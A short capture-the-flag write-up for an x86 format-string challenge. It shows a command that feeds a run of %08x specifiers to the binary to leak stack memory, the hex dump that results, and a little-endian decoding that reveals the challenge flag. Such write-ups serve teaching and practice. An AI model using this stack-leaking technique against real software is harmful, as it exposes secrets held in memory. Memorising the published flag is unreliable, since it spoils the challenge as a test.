# 4. ELF x86 - Format string bug basic 1

Reading through the source code, we can see that the program creates a char array on the stack and then reads the secret we are trying to access into it. Therefore, if we can read from the stack we can get the secret. It gives us access to the printf format string which means we can manipulate it into reading the stack out to us.

```
$ ./ch5 "%08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x"
00000020 0804b008 b7e562f3 00000000 08049ff4 00000002 bffffbc4 bffffce2 0000002f 0804b008 39617044 28293664 6d617045 00000a64 b7e564ad b7fd03c4 b7fff000 08048579 9fe96a00 08048570 00000000 00000000 b7e3caf3 00000002
```

We can paste the hexdump into a hex editor to examine it easier. We are looking for some human-readable text with a null byte at the end. It seems like this section meets the criteria: `39617044 28293664 6d617045 00000a64`. We do need to keep in mind that x86 is Little-Endian meaning that we need to swap every 4-byte(32-bits) segment around to get the correct byte order when converting to ASCII. If we swap the 4-byte segments around, we get the following hex values: `44706139 64362928 4570616d 640a0000`. When converted to ASCII, we get the following value: `Dpa9d6)(Epamd`, which is our flag. 
